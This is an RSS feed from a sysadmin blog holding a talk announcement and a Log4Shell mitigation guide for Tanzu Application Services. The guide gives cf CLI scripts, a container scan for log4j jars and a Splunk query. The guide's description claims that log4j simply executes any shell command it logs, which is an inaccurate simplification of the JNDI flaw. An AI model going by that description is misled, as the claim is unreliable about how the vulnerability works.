<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>The Fluffy Admin</title>
	<atom:link href="https://thefluffyadmin.net/?feed=rss2" rel="self" type="application/rss+xml" />
	<link>https://thefluffyadmin.net</link>
	<description>The life and times of the Fluffy SysAdmin</description>
	<lastBuildDate>Mon, 11 Apr 2022 16:56:12 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.0</generator>
<site xmlns="com-wordpress:feed-additions:1">7260995</site>	<item>
		<title>Spoke at the VMUGNL 2021</title>
		<link>https://thefluffyadmin.net/?p=1731</link>
					<comments>https://thefluffyadmin.net/?p=1731#respond</comments>
		
		<dc:creator><![CDATA[Thefluffyadmin]]></dc:creator>
		<pubDate>Mon, 11 Apr 2022 16:56:12 +0000</pubDate>
				<category><![CDATA[cloud-native]]></category>
		<category><![CDATA[Tanzu]]></category>
		<category><![CDATA[vmware]]></category>
		<category><![CDATA[kubernetes]]></category>
		<category><![CDATA[tanzu kubernetes grid]]></category>
		<category><![CDATA[tkg]]></category>
		<category><![CDATA[tkgi]]></category>
		<category><![CDATA[tkgm]]></category>
		<guid isPermaLink="false">https://thefluffyadmin.net/?p=1731</guid>

					<description><![CDATA[VMUGNL - Different between TKG versions Late last year, I spoke at the VMUGNL about the differences between the different TKG versions; TKGi, TKGm and TKGs, as they existed at the end of 2021 Talk is in Dutch (which is quite rare for me)]]></description>
										<content:encoded><![CDATA[<h1>VMUGNL - Different between TKG versions</h1>
<p>Late last year, I spoke at the <a href="https://vmugnl.nl/">VMUGNL</a> about the differences between the different TKG versions; TKGi, TKGm and TKGs, as they existed at the end of 2021</p>
<p>Talk is in Dutch (which is quite rare for me)</p>
<p><iframe class="youtube-player" width="640" height="360" src="https://www.youtube.com/embed/N3Cv1CyF-c4?version=3&#038;rel=1&#038;showsearch=0&#038;showinfo=1&#038;iv_load_policy=1&#038;fs=1&#038;hl=en-US&#038;autohide=2&#038;wmode=transparent" allowfullscreen="true" style="border:0;" sandbox="allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox"></iframe></p>
]]></content:encoded>
					
					<wfw:commentRss>https://thefluffyadmin.net/?feed=rss2&#038;p=1731</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<image>https://thefluffyadmin.net/wp-content/uploads/2022/04/Pasted.png</image><post-id xmlns="com-wordpress:feed-additions:1">1731</post-id>	</item>
		<item>
		<title>Log4j Security Vulnerabilities CVE-2021-44228 &#8211; Mitigation Strategies for Tanzu Application Services Operators</title>
		<link>https://thefluffyadmin.net/?p=1712</link>
					<comments>https://thefluffyadmin.net/?p=1712#respond</comments>
		
		<dc:creator><![CDATA[Thefluffyadmin]]></dc:creator>
		<pubDate>Wed, 15 Dec 2021 19:08:25 +0000</pubDate>
				<category><![CDATA[cloud-native]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[vexpert]]></category>
		<category><![CDATA[vmware]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[log4j]]></category>
		<category><![CDATA[log4shell]]></category>
		<category><![CDATA[Pivotal]]></category>
		<category><![CDATA[Tanzu]]></category>
		<category><![CDATA[TAS]]></category>
		<category><![CDATA[tkgi]]></category>
		<category><![CDATA[vanguard]]></category>
		<guid isPermaLink="false">https://thefluffyadmin.net/?p=1712</guid>

					<description><![CDATA[This post was created by the VMware Tanzu Vanguard community. (https://tanzu.vmware.com/vanguard) This community is a small group of VMware Tanzu users, who came over from the Pivotal community, and represent some of VMware's largest and coolest TAS (Tanzu Application Services) and TKGI (Tanzu Kubernetes Grid Integrated)  customers and partners. This community is lead by the <br><a class="read-more-button" href="https://thefluffyadmin.net/?p=1712">Read More &#187;</a>]]></description>
										<content:encoded><![CDATA[<p>This post was created by the VMware Tanzu Vanguard community. (<a href="https://tanzu.vmware.com/vanguard">https://tanzu.vmware.com/vanguard</a>)<br />
This community is a small group of VMware Tanzu users, who came over from the Pivotal community, and represent some of VMware's largest and coolest TAS (Tanzu Application Services) and TKGI (Tanzu Kubernetes Grid Integrated)  customers and partners. This community is lead by the incomparable Brian Chang --&gt; <a href="https://twitter.com/techadvoguy">https://twitter.com/techadvoguy</a><br />
While I am mentioned in the credits.. I really only contributed the xkcd image :p</p>
<p>------------</p>
<p><span style="font-weight: 400;">Log4j Security Vulnerabilities CVE-2021-44228 - Mitigation Strategies for TAS Operators</span></p>
<p><span style="font-weight: 400;">By the </span><a href="https://tanzu.vmware.com/vanguard"><span style="font-weight: 400;">Tanzu Vanguard</span></a><span style="font-weight: 400;"> community - key contributors: Simmy Xavier, Charles Lester, Juergen Sussner, Jonathan Regehr &amp; Robert Kloosterhuis</span></p>
<p>&nbsp;</p>
<p><b>Summary Brief:</b></p>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">Apache Log4j is a very widely used and popular logging library within the Java logging framework. There is a vulnerability named as Log4Shell identified and is being tracked officially under CVE-2021-44228 (and a second one under CVE-2021-45046). The vulnerability allows for RCE (Remote Code Execution) attacks which significantly increase the risk of exploitation. Hackers could use this to post malicious code which can be used for crypto mining or information extraction. There are reports of increased scanning happening across the Internet to identify vulnerable systems and infect them with malware or ransomware. This issue was discovered as early as Dec 1st by Chen Zhaojun of Alibaba Cloud Security Team and impacted across log4j-core v2.0 to v2.14.1. Apache had released the version v2.15.0</span><span style="font-weight: 400;"> a</span><span style="font-weight: 400;">s of Dec 5. Apache has released version v2.16.0</span><span style="font-weight: 400;"> a</span><span style="font-weight: 400;">s of Dec 14. This vulnerability has a severity rating of 10 out of 10 and is treated as a Zero-day vulnerability as of Dec 10 when this became a public disclosure.</span><b><br />
</b></p>
<p>&nbsp;</p>
<h1><span style="font-weight: 400;">Description: </span></h1>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">If</span><span style="font-weight: 400;"> you have a system that uses log4j and you can get that system to log a JNDI URL or a shell command, log4j will actually execute the shell command.</span></p>
<p><span style="font-weight: 400;"><br />
</span><span style="font-weight: 400;"><br />
</span><span style="font-weight: 400;">The simplest one is a Minecraft server - they log any chat messages that are sent, so if you put something malicious in the chat message, log4j will execute it as it logs the message.</span><span style="font-weight: 400;"><br />
</span><span style="font-weight: 400;">The TAS platform itself uses a vulnerable Log4j library in some of the tiles and the TAS tile. Apps built with the Java buildpack may also pull in vulnerable libraries</span></p>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">CISA is not able to confirm that merely using a newer JRE is sufficient for protection. See the discussion at this blog </span><a href="http://www.openwall.com/lists/oss-security/2021/12/10/3"><span style="font-weight: 400;">http://www.openwall.com/lists/oss-security/2021/12/10/3</span></a><span style="font-weight: 400;"> and in the meantime, it is also confirmed that a modified version of this exploit is not restricted to a specific JVM version</span></p>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">Full remediation requires the use of log4j &gt;= 2.16.0. The mitigation strategies merely reduce the attack surface area but do not fully protect against the threat.</span></p>
<p>&nbsp;</p>
<h1><span style="font-weight: 400;">Mitigation strategies for TAS </span></h1>
<h3><b>For systems running log4j &gt;= 2.10.0 (thanks, Simmy Xavier!): </b></h3>
<ol>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">One approach is to set the </span><span style="font-weight: 400;">LOG4J_FORMAT_MSG_NO_LOOKUPS</span><span style="font-weight: 400;"> variable in the running environment variable group</span><span style="font-weight: 400;">, reflected in example (1) below. The limitation to this approach is that “</span><span style="font-weight: 400;">Any user-defined variable takes precedence over environment variables provided by these groups.” </span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Another approach is to place the variable in the environment of every app, reflected in example (2) below. The limitation to this approach is that a subsequent restage of the application will cause the variable to be lost.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Instead of setting the env variable </span><span style="font-weight: 400;">LOG4J_FORMAT_MSG_NO_LOOKUPS</span><span style="font-weight: 400;"> you can also add -Dlog4j2.formatMsgNoLookups=true to the JAVA_OPTS variable</span></li>
</ol>
<h3><b>For any systems running log4j 2.*</b></h3>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">The more comprehensive mitigation strategy is to remove the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class)</span></p>
<p>&nbsp;</p>
<h3><b>For older 1.x v</b><b>ersions:</b></h3>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">Although 1.x seems to be not affected by this, it is an old version which is out of support for a really long time and may be vulnerable to various other problems. Therefore Log4J 1.x should also be considered for updates. Depending on the Apps this could be achieved fairly simply by using the API bridge as described here: </span><a href="https://logging.apache.org/log4j/2.x/manual/migration.html"><span style="font-weight: 400;">https://logging.apache.org/log4j/2.x/manual/migration.html</span></a></p>
<p>&nbsp;</p>
<h3><b>Example mitigation strategies for TAS running log4j &gt;= 2.10.0 (thanks to Simmy Xavier):</b><span style="font-weight: 400;"> </span></h3>
<p>&nbsp;</p>
<ol>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Set the running environmental variable group (see </span><a href="https://docs.cloudfoundry.org/devguide/deploy-apps/environment-variable.html#evgroups"><span style="font-weight: 400;">https://docs.cloudfoundry.org/devguide/deploy-apps/environment-variable.html#evgroups</span></a><span style="font-weight: 400;">) </span><span style="font-weight: 400;">(restart requires CLI &gt;= 7) (note: if you have any </span><b>existing</b><span style="font-weight: 400;"> running environmental variables, then you’ll need to add those into the </span><i><span style="font-weight: 400;">srevg</span></i><span style="font-weight: 400;"> command, as the command expects to receive all the variables for the group, i.e., the command will set the revg to only what you specify in the command)</span><span style="font-weight: 400;">:</span></li>
</ol>
<p>&nbsp;</p>
<pre><span style="font-weight: 400;">cf srevg '{"LOG4J_FORMAT_MSG_NO_LOOKUPS":"true"}'</span>

<span style="font-weight: 400;">cf restart &lt;app-name&gt; --strategy rolling</span>

</pre>
<p><span style="font-weight: 400;">2. Set the environment variable for a particular app (restart requires CLI &gt;= 7):</span></p>
<pre>

<span style="font-weight: 400;">cf set-env &lt;app-name&gt; LOG4J_FORMAT_MSG_NO_LOOKUPS true</span>

<span style="font-weight: 400;">cf restart &lt;app-name&gt; --strategy rolling</span>

</pre>
<p><span style="font-weight: 400;">3. Script to loop through all apps in a space, apply the change in (2) and restart the app (restart requires CLI &gt;= 7):</span></p>
<p>&nbsp;</p>
<pre><span style="font-weight: 400;">cf apps | sed -n </span><span style="font-weight: 400;">'</span><span style="font-weight: 400;">4,$p</span><span style="font-weight: 400;">'</span><span style="font-weight: 400;">| awk </span><span style="font-weight: 400;">'</span><span style="font-weight: 400;">{print $1}</span><span style="font-weight: 400;">'</span><span style="font-weight: 400;"> | while read appName</span>

<span style="font-weight: 400;">do cf set-env $appName LOG4J_FORMAT_MSG_NO_LOOKUPS true; </span>

<span style="font-weight: 400;">cf restart $appName --strategy rolling</span>

<span style="font-weight: 400;">done</span>

</pre>
<p><span style="font-weight: 400;">4. Script to apply the change in (1), then loop through every app in every space in every org, and restart the app (restart requires CLI &gt;= 7) (you may want to edit the loops to exclude certain orgs, spaces, or apps):</span></p>
<p>&nbsp;</p>
<pre>'''

Applies the fix, then runs through every org in every space, and restarts every app

Note that “Any user-defined variable takes precedence over environment variables provided by these groups.” 

'''

cf srevg '{"LOG4J_FORMAT_MSG_NO_LOOKUPS":"true"}'

for org in $(cf orgs | sed -n '4,$p' | awk '{print $1}')

  do 

    cf t -o $org 1&gt;/dev/null 2&gt;&amp;1

    for space in $(cf spaces | sed -n '4,$p' | awk '{print $1}')

      do cf t -o $org -s $space 1&gt;/dev/null 2&gt;&amp;1

        rc=$?

        if [[ $rc -eq 0 ]]

          then

               apps=$(cf apps | sed -n '4,$p' | awk '{print $1}')

               for app in $apps

                  do cf restart $app –-strategy rolling

                  done

          else echo "cf t -o $org -s $space failed"

        fi

      done

  done</pre>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">5. Script to loop through every app in every space in every org, apply the change in (2) and restart the app (restart requires CLI &gt;= 7) (you may want to edit the loops to exclude certain orgs, spaces, or apps):</span></p>
<p>&nbsp;</p>
<pre><span style="font-weight: 400;">'''</span>

<span style="font-weight: 400;">Runs through every org in every space, applies the (temporary) fix, and restarts the app </span>


<span style="font-weight: 400;">'''</span>

<span style="font-weight: 400;">for org in $(cf orgs | sed -n '4,$p' | awk '{print $1}')</span>

<span style="font-weight: 400;">  do </span>

<span style="font-weight: 400;">    cf t -o $org 1&gt;/dev/null 2&gt;&amp;1</span>

<span style="font-weight: 400;">    for space in $(cf spaces | sed -n '4,$p' | awk '{print $1}')</span>

<span style="font-weight: 400;">      do cf t -o $org -s $space 1&gt;/dev/null 2&gt;&amp;1</span>

<span style="font-weight: 400;">        rc=$?</span>

<span style="font-weight: 400;">        if [[ $rc -eq 0 ]]</span>

<span style="font-weight: 400;">          then</span>

<span style="font-weight: 400;">               apps=$(cf apps | sed -n '4,$p' | awk '{print $1}')</span>

<span style="font-weight: 400;">               for app in $apps</span>

<span style="font-weight: 400;">                  do cf set-env $app LOG4J_FORMAT_MSG_NO_LOOKUPS true</span>

<span style="font-weight: 400;">                     cf restart $app </span><span style="font-weight: 400;">--</span><span style="font-weight: 400;">strategy rolling</span>

<span style="font-weight: 400;">                  done</span>

<span style="font-weight: 400;">          else echo "cf t -o $org -s $space failed"</span>

<span style="font-weight: 400;">        fi</span>

<span style="font-weight: 400;">      done</span>

<span style="font-weight: 400;">  done</span>


</pre>
<p><span style="font-weight: 400;">Hint:</span></p>
<p><span style="font-weight: 400;">When using cf restart app –strategy rolling, the process of the rolling restart utilizes TAS features called deployments and this requires new apps to be started while the old ones are still running. This requires some additional ORG Quota or in other words, a rolling restart will fail in an ORG with no Quota left.</span></p>
<p>&nbsp;</p>
<h1><span style="font-weight: 400;">Apache mitigation recommendations</span></h1>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">Apache's recommendations, located at</span> <a href="https://nam04.safelinks.protection.outlook.com/?url=https%3A%2F%2Flogging.apache.org%2Flog4j%2F2.x%2Fsecurity.html&amp;data=04%7C01%7Cbrichang%40vmware.com%7Cc5e9e5e75a764332347e08d9bf180ee4%7Cb39138ca3cee4b4aa4d6cd83d9dd62f0%7C0%7C0%7C637750932331640972%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000&amp;sdata=c6n%2FCfJ8Agg8jHzqSFXlgpM7omaS%2BITVIKy4hQV70fY%3D&amp;reserved=0"><span style="font-weight: 400;">https://logging.apache.org/log4j/2.x/security.html</span></a><span style="font-weight: 400;">, </span><span style="font-weight: 400;">depending on the version of log4j2, are:</span></p>
<table>
<tbody>
<tr>
<td><b>Log4j version</b></td>
<td><b>Mitigation Plan</b></td>
</tr>
<tr>
<td><span style="font-weight: 400;">2.16.0</span></td>
<td><span style="font-weight: 400;">Nothing</span></td>
</tr>
<tr>
<td><span style="font-weight: 400;">2.15.0</span></td>
<td><span style="font-weight: 400;">Upgrade to 2.16.0</span></td>
</tr>
<tr>
<td><span style="font-weight: 400;">2.10.0 - 2.14.1</span></td>
<td><span style="font-weight: 400;">Upgrade to 2.16.0</span></p>
<p><span style="font-weight: 400;">OR</span></p>
<p><span style="font-weight: 400;">Add Environment Variable "LOG4J_FORMAT_MSG_NO_LOOKUPS" to "true"</span></p>
<p><span style="font-weight: 400;">OR</span></p>
<p><span style="font-weight: 400;">Add system property "log4j2.formatMsgNoLookup" to "true"</span></td>
</tr>
<tr>
<td><span style="font-weight: 400;">2.0 - 2.9.1</span></td>
<td><span style="font-weight: 400;">Upgrade to 2.16.0</span></p>
<p><span style="font-weight: 400;">OR</span></p>
<p><span style="font-weight: 400;">Remove JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class</span></td>
</tr>
<tr>
<td><span style="font-weight: 400;">1.x</span></td>
<td><span style="font-weight: 400;">Log4j 1.x is no longer supported at all, and a bug related to Log4Shell, dubbed CVE-2021-4104, exists in this version</span></td>
</tr>
</tbody>
</table>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">Several of the VMware products along with other vendors are using this popular framework and actively working in releasing a workaround and or a patch. VMware products impacted and the status of patch and workaround is posted under the Security Advisory located at </span><a href="https://www.vmware.com/security/advisories/VMSA-2021-0028.html"><span style="font-weight: 400;">https://www.vmware.com/security/advisories/VMSA-2021-0028.html</span></a></p>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">Based on the blog on Spring.io (</span><a href="https://nam04.safelinks.protection.outlook.com/?url=https%3A%2F%2Fspring.io%2Fblog%2F2021%2F12%2F10%2Flog4j2-vulnerability-and-spring-boot&amp;data=04%7C01%7Cbrichang%40vmware.com%7Cc5e9e5e75a764332347e08d9bf180ee4%7Cb39138ca3cee4b4aa4d6cd83d9dd62f0%7C0%7C0%7C637750932331640972%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000&amp;sdata=FqU85dZ93UtOPN8LrAHBl0Q3thm%2F%2Bk6hvs6n7hTuIaA%3D&amp;reserved=0"><span style="font-weight: 400;">https://spring.io/blog/2021/12/10/log4j2-vulnerability-and-spring-boot</span></a><span style="font-weight: 400;">), Spring Boot users are only impacted if they have switched the default logging system to log4j2.</span></p>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">Workarounds until a patch can be applied across the TAS foundation would be to set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS as true This could be done at a Global Level or at an App level but in either case require a restart for it to take effect. </span></p>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">Setting at Global level - </span><strong>cf srevg '{"LOG4J_FORMAT_MSG_NO_LOOKUPS":"true"}'</strong></p>
<p><span style="font-weight: 400;">Setting at an App Level - </span><strong>cf set-env &lt;app-name&gt; LOG4J_FORMAT_MSG_NO_LOOKUPS true</strong></p>
<p><span style="font-weight: 400;">Restart the app instances in a rolling fashion (require cf cli v7+) - </span><strong>cf restart &lt;app-name&gt; --strategy rolling</strong></p>
<p><span style="font-weight: 400;">Validating the change - </span><strong>cf env &lt;app-name&gt; | grep LOG4J</strong></p>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">Other useful scripts</span></p>
<p>&nbsp;</p>
<pre><span style="font-weight: 400;">Script to set environment variable (all apps in a space)</span>

<span style="font-weight: 400;">cf apps | sed -n '4,$p'| awk '{print $1}' | while read appName; do cf set-env $appName LOG4J_FORMAT_MSG_NO_LOOKUPS true; done</span>

<span style="font-weight: 400;">Script to perform Rolling restart (all apps in a space)</span>

<span style="font-weight: 400;">cf apps | sed -n '4,$p'| awk '{print $1}' | while read appName; do cf restart $appName --strategy rolling; done</span>

<span style="font-weight: 400;">Script to validate (all apps in a space)</span>

<span style="font-weight: 400;">cf apps | sed -n '4,$p'| awk '{print $1}' | while read appName; do cf env $appName | grep LOG4J ; done</span>


</pre>
<h1><span style="font-weight: 400;">How TAS as immutable infrastructure helps</span></h1>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">Despite all the mitigation strategies, there is still a risk that some remote Code got dropped in a running Container. To proactively cope with that you can use the features of TAS where containers get recreated from an immutable source Image (the droplet). So why not run the restart scripts above on a regular basis, to constantly wipe out all that got into a container. </span></p>
<h1></h1>
<h1><span style="font-weight: 400;">Monitoring app changes on TAS</span></h1>
<p><span style="font-weight: 400;">Pathing TAS is essential and having Apps secured should be the first priority. But you may also want to know how your apps are behaving and if they have any vulnerable version within their containers. To get to know this you can set up a search job to investigate all running containers. </span></p>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">The Following Script can be run as a task in TAS</span></p>
<pre><span style="font-weight: 400;">API=`echo $VCAP_APPLICATION | jq -r ".cf_api"`</span>




<span style="font-weight: 400;">cf login -a $API -u $USER -p $PASSWD -o dummyorg -s dummyspace</span>

<span style="font-weight: 400;">for org in $(cf orgs | sed -n '4,$p' | awk '{print $1}')</span>

<span style="font-weight: 400;">  do</span>

<span style="font-weight: 400;">    cf t -o $org 1&gt;/dev/null 2&gt;&amp;1</span>

<span style="font-weight: 400;">    for space in $(cf spaces | sed -n '4,$p' | awk '{print $1}')</span>

<span style="font-weight: 400;">      do cf t -o $org -s $space 1&gt;/dev/null 2&gt;&amp;1</span>

<span style="font-weight: 400;">        rc=$?</span>

<span style="font-weight: 400;">        if [ $rc -eq 0 ]</span>

<span style="font-weight: 400;">          then</span>

<span style="font-weight: 400;">               apps=$(cf apps | sed -n '4,$p' | awk '{print $1}')</span>

<span style="font-weight: 400;">               for app in $apps</span>

<span style="font-weight: 400;">                  do </span>

<span style="font-weight: 400;">                     log4jversion=`cf ssh "$app" -c "cd /app; find -iname '*$PATTERN*'" |tr '\n' ' '` </span>

<span style="font-weight: 400;">                     rc=$?</span>

<span style="font-weight: 400;">                     if [ $rc -eq 0 ]</span>

<span style="font-weight: 400;">                     then</span>

<span style="font-weight: 400;">                        if [ -z "$log4jversion" ]</span>

<span style="font-weight: 400;">                            then</span>

<span style="font-weight: 400;">                                echo "ORG=$org   SPACE=$space   APP=$app LOG4JVERSION=not found"</span>

<span style="font-weight: 400;">                            else</span>

<span style="font-weight: 400;">                                echo "ORG=$org   SPACE=$space   APP=$app LOG4JVERSION=$log4jversion"</span>

<span style="font-weight: 400;">                        fi </span>

<span style="font-weight: 400;">                     else </span>

<span style="font-weight: 400;">                        echo "ORG=$org   SPACE=$space   APP=$app LOG4JVERSION=not-ssh-able"</span>

<span style="font-weight: 400;">                     fi</span>

<span style="font-weight: 400;">                  done</span>

<span style="font-weight: 400;">          else echo "cf t -o $org -s $space failed"</span>

<span style="font-weight: 400;">        fi</span>

<span style="font-weight: 400;">      done</span>

<span style="font-weight: 400;">  done</span></pre>
<p><span style="font-weight: 400;">This script will ssh into every container running on TAS and search its filesystem for log4j versions. You can utilize the TAS scheduler (</span><a href="https://network.pivotal.io/products/p-scheduler/"><span style="font-weight: 400;">https://network.pivotal.io/products/p-scheduler/</span></a><span style="font-weight: 400;">) to run this TASK once a day</span></p>
<p>&nbsp;</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/12/Screenshot-2021-12-15-195502.jpg?ssl=1"><img data-recalc-dims="1" fetchpriority="high" decoding="async" class="alignnone size-full wp-image-1716" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/12/Screenshot-2021-12-15-195502.jpg?resize=494%2C289&#038;ssl=1" alt="" width="494" height="289" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/12/Screenshot-2021-12-15-195502.jpg?w=494&amp;ssl=1 494w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/12/Screenshot-2021-12-15-195502.jpg?resize=300%2C176&amp;ssl=1 300w" sizes="(max-width: 494px) 100vw, 494px" /></a></p>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">The Log output can be forwarded to any Log Management System which allows you to create a “real time” dashboard.</span></p>
<p><span style="font-weight: 400;">If you use Splunk, the query would be:</span></p>
<pre>
<span style="font-weight: 400;">index=&lt;TAS_FOUNDATION&gt; cf_app_name=AdminScripts event_type=LogMessage </span>

<span style="font-weight: 400;">| rex field=msg  "ORG=(?&lt;orgname&gt;.*)   SPACE=(?&lt;spacename&gt;.*)   APP=(?&lt;appname&gt;.*) LOG4JVERSION=(?&lt;testresult&gt;.*)" </span>

<span style="font-weight: 400;">| eval files=split(testresult," ")</span>

<span style="font-weight: 400;">| rex field=files "log4j-core-(?&lt;log4jversion&gt;.*).jar"</span>

<span style="font-weight: 400;">| eval log4jversion=mvjoin (mvsort(mvdedup(log4jversion)), ",")</span>

<span style="font-weight: 400;">| table orgname, spacename, appname, log4jversion, files</span>

<span style="font-weight: 400;">| sort log4jversion desc</span></pre>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">This creates a nice visualization like this</span></p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/12/Screenshot-2021-12-15-195737.jpg?ssl=1"><img data-recalc-dims="1" decoding="async" class="alignnone size-full wp-image-1718" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/12/Screenshot-2021-12-15-195737.jpg?resize=640%2C103&#038;ssl=1" alt="" width="640" height="103" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/12/Screenshot-2021-12-15-195737.jpg?w=1088&amp;ssl=1 1088w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/12/Screenshot-2021-12-15-195737.jpg?resize=300%2C48&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/12/Screenshot-2021-12-15-195737.jpg?resize=1024%2C165&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/12/Screenshot-2021-12-15-195737.jpg?resize=768%2C124&amp;ssl=1 768w" sizes="(max-width: 640px) 100vw, 640px" /></a></p>
<p><span style="font-weight: 400;">With this, you can get an Overview of which app uses which version and as you can see in this example there are sometimes “hidden” Versions or more than one Version within the app as agents like the AppDynamics Agent have their own version in place.</span></p>
<p>&nbsp;</p>
<h1><span style="font-weight: 400;">Patching apps the hard way…</span></h1>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">You may also face apps that refuse to be patched because there is no source code available or no pipeline or for whatever reason. In this case, you can try the following approach to patch such apps.</span></p>
<p>&nbsp;</p>
<ol>
<li style="font-weight: 400;" aria-level="1">
<pre><span style="font-weight: 400;">cf app  vulnerableApp –guid</span></pre>
</li>
<li style="font-weight: 400;" aria-level="1">
<pre><span style="font-weight: 400;">cf curl /v3/apps/&lt;guid&gt;/packages</span></pre>
</li>
<li style="font-weight: 400;" aria-level="1">
<pre><span style="font-weight: 400;">Copy the download link from the links section</span></pre>
</li>
<li style="font-weight: 400;" aria-level="1">
<pre><span style="font-weight: 400;">cf oauth-token </span></pre>
</li>
<li style="font-weight: 400;" aria-level="1">
<pre><span style="font-weight: 400;">curl -L &lt;downloadLink&gt; –header “Authorization: &lt;oauthToken&gt;” -o app.zip</span></pre>
</li>
<li style="font-weight: 400;" aria-level="1">
<pre><span style="font-weight: 400;">Now path whatever needs to be patched in the app.zip</span></pre>
</li>
<li style="font-weight: 400;" aria-level="1">
<pre><span style="font-weight: 400;">cf create-app-manifest vulnerableApp</span></pre>
</li>
<li style="font-weight: 400;" aria-level="1">
<pre><span style="font-weight: 400;">cf push fixedApp -f vulnerableApp_manifest.yml -p app.zip</span></pre>
</li>
<li style="font-weight: 400;" aria-level="1">
<pre><span style="font-weight: 400;">cf stop vulnerableApp</span></pre>
</li>
</ol>
<p><span style="font-weight: 400;">This will deploy a second, patched version alongside the vulnerable app with the same settings, effectively having a blue-green deployment of a patched and a vulnerable app. </span></p>
<p>&nbsp;</p>
<hr />
<p>&nbsp;</p>
<p><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full" src="https://i0.wp.com/imgs.xkcd.com/comics/dependency.png?resize=385%2C489&#038;ssl=1" alt="https://xkcd.com/2347/" width="385" height="489" /></p>
<h1></h1>
<h1><span style="font-weight: 400;">Appendix:</span></h1>
<ul>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">How to detect the Log4j vulnerability in your applications: </span><a href="https://www.infoworld.com/article/3644492/how-to-detect-the-log4j-vulnerability-in-your-applications.html"><span style="font-weight: 400;">https://www.infoworld.com/article/3644492/how-to-detect-the-log4j-vulnerability-in-your-applications.html</span></a><span style="font-weight: 400;"> </span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Apache Log4j Security Vulnerabilities: </span><a href="https://logging.apache.org/log4j/2.x/security.html"><span style="font-weight: 400;">https://logging.apache.org/log4j/2.x/security.html</span></a><span style="font-weight: 400;"> </span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">URGENT: Analysis and Remediation Guidance to the Log4j Zero-Day RCE (CVE-2021-44228) Vulnerability:</span><span style="font-weight: 400;"><br />
</span><a href="https://www.veracode.com/blog/security-news/urgent-analysis-and-remediation-guidance-log4j-zero-day-rce-cve-2021-44228"><span style="font-weight: 400;">https://www.veracode.com/blog/security-news/urgent-analysis-and-remediation-guidance-log4j-zero-day-rce-cve-2021-44228</span></a><span style="font-weight: 400;"> </span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">National Vulnerability Database for CVE-2021-44228 (with some excellent links): </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-44228"><span style="font-weight: 400;">https://nvd.nist.gov/vuln/detail/CVE-2021-44228</span></a></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">National Vulnerability Database for CVE-2021-45046 (with some excellent links): </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-45046"><span style="font-weight: 400;">https://nvd.nist.gov/vuln/detail/CVE-2021-45046</span></a></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">CISA guidance </span><a href="https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance"><span style="font-weight: 400;">https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance</span></a><span style="font-weight: 400;"> </span></li>
